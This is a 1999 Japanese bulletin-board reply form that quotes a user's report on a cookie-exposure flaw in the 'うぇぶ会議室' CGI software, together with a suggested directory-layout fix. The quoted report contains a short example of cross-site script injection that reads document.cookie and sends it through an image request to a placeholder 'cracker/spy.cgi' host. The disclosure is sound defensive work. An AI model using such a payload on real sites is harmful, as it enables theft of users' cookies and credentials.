うぇぶ会議室の部屋4への投稿
記事番号00031へのフォローを投稿します。
引用記事中のHTMLをエスケープせずに
そのまま引用
することも出来ます。
お名前(ペンネイムで結構ですが必要です)
(
ブラウザに個人情報を覚えさせない)
電子メイルアドレス(必要です)
題名(必要です)
Home Page がある方はリンク希望先の URL を記載して下さい
会議室に載せたい内容を以下へお書き下さい (
HTMLを解釈せずにそのまま表示)
7月14日に、きゅんべるさんは書きました。 > 二ヶ月ほど前、cumberというハンドルで投稿した、"きゅんべる"です。 > > うぇぶ会議室で、「これはちょっと問題かな?」と思えなくもないところを >見つけたので、報告したいと思います。 > > > いま、うぇぶ会議室の普通の設定では、 > > CGIディレクトリ −−−− 会議室1のディレクトリ > |−− 会議室2のディレクトリ > |−− 会議室3のディレクトリ > >と言うようになってますよね。 > > すると、この設定では、会議室の投稿ファイルからcookieをアクセスすると、 >CGIで使ってるcookieつまり、ハンドルネームやキャンセルコードが見えて >しまうと思うんです。 > > 例えば、JavaScriptで、 > private_data = document.cookie; > <IMG SRC="http://www.hoge.ne.jp/cracker/spy.cgi?private_data"> >などといったコードを投稿にし込んだ場合、アクセス者のパスワードなども盗め >てしまうと思うんです。 > > ディレクトリー構成として、 > |−− CGIディレクトリ > |−− 会議室1のディレクトリ > |−− 会議室2のディレクトリ > |−− 会議室3のディレクトリ >とかを推奨したほうがいいと思うのですが、如何でしょう?
ホームペーヂに戻る
nir@mvg.biglobe.ne.jp
Last Update: 2 December 1999